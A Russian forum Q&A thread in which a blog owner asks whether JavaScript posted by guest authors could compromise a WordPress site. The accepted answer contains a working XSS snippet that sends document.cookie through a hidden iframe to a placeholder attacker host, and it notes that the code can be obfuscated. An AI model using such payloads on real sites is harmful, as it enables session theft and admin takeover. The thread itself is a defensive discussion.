# Могут ли взломать сайт с помощью внедрения JS кода?

Tags: взлом, javascript

Да-да, многие говорят что фантазия безгранична, и что взломать вроде можно, но я пока не вижу способов, да я и в JS не большой спец. Хотелось бы увидеть конкретный пример взлома сайта (получения доступа к ftp, к файлам, возможность удалять/создавать файлы, менять права и тп.)

**Для внутренних органов:** интересуюсь чисто в целях самозащиты =) Хочу давать право на написание статей на блоге незнакомым авторам, вот и интересно - WP пропускает JS прекрасно, делать с этим что-то, или оставить так.

Comment: Подобный случай наблюдался у меня на сайте, как обезопасить себя от этого? Пробовал поставить права доступа к файлу куки - не получилось.

Answer (score 15, accepted):

Банальный пример:

```
var i = document.createElement('iframe');
i.style='width: 1px; height: 1px; visibility: hidden;';
document.getElementsByTagName('body')[0].appendChild(i);
i.src='http://vasya-pupkin-xakep.org/stealcookie.php?c='+document.cookie;
```

Таким образом хакер Вася Пупкин часто тырит админские куки и очень быстро заходит с ними на сайт. Если у админа есть возможность редактировать файлы из админки - это полный контроль (есть такие штуки как phpftp и phpmyadmin)

Также этот код можно за- и перешифровать три раза, чтобы это был нечитаемый набор символов. Вместо куков можно просто таким образом накручивать посещения другому сайту etc.

Comment: То есть, по сути через подтягивание iframme можно подтянуть хакерский набор джентельмена (system, например), и творить что пожелаешь?

Comment: Ну это нет. Обычно при такой адресации хакеру приходит письмо, он быстро прописывает куки в браузере и входит в админку. А из админки уже подтягивает все, что ему надо.

Comment: И это единственное, что может сделать хакер?

Comment: Ну нет, может вместо фрейма сделать картинку, может тупо накручивать рейтинг своему сайту, как раньше заметили - может попортить индексацию поисковиками, может ради прикол дефейс на js сделать (будет на 1 странице надпись "][aked By VPupkin")

Comment: Ну в моем случае, я буду давать доступ пользователям писать статьи на блоге, т.е. я таки буду смотреть чего они там пишут)

Comment: JS лучше запретить, правда) Если надо для статьи - вставляйте лично, а так если его можно использовать - сайт можно сломать.

Comment: А что такое stealcookie.php ?

Answer (score 3):

Вообще через js можно проводить xss атаки, а если у вас на сайте ajax и серверная часть самописная, никто не исключает, что таким образом можно будет как-то напакостить в системе; например: у вас в обработчике ajax есть метод DeleteFileOnServer, если при выполнении метода никак не проверяются права, то можно представить ситуации, в которых злоумышленник сформирует ajax запрос, используя метод DeleteFileInServer, и удалит какой-либо файл, не имея на это право, однако в большинстве случаев, подобные вещи тестируются разработчиками веб-приложения, воодится проверка прав и тд.

По теме: [методика атак XSS](http://hacker.3dn.ru/publ/1-1-0-45), [общие словеса на тему ajax-security](http://webcrunch.ru/library/development/clientside/ajax-security/).

Comment: Нет нет,  я говорю о том, что мы предоставляем незнакомому человеку внедрять в код страницы javascript код.

Answer (score 1):

Это невозможно. Максимум, что может быть, - это кража кук. И то напрямую их отправить не удастся (AJAX на другой домен запрещен и не работает, лично проверял).

Придется отправлять в запросе картинки, например `img.png?jesnfjkndsfjkndskjweklfngjksdngjksnjdsg` - в конце закодирован кук. Такую технологию, например, использует веб-аналитика Yandex WebVisor (лично смотрел).

Есть еще нюансы. JS может создать текст внутри страницы, который потом будет проиндексирован Гуглом. Это правда - лично убедился на примере партнерки фотостраны, когда ключевые слова питомец, подарок оказались самыми частотными согласно webmasters.google.com (сайт про апокалипсис).

Еще недобросовестные авторы смогут переадресовать страницу, делать ссылки, картинки, баннеры.

Но к ftp, к файлам доступ получить **невозможно** будет.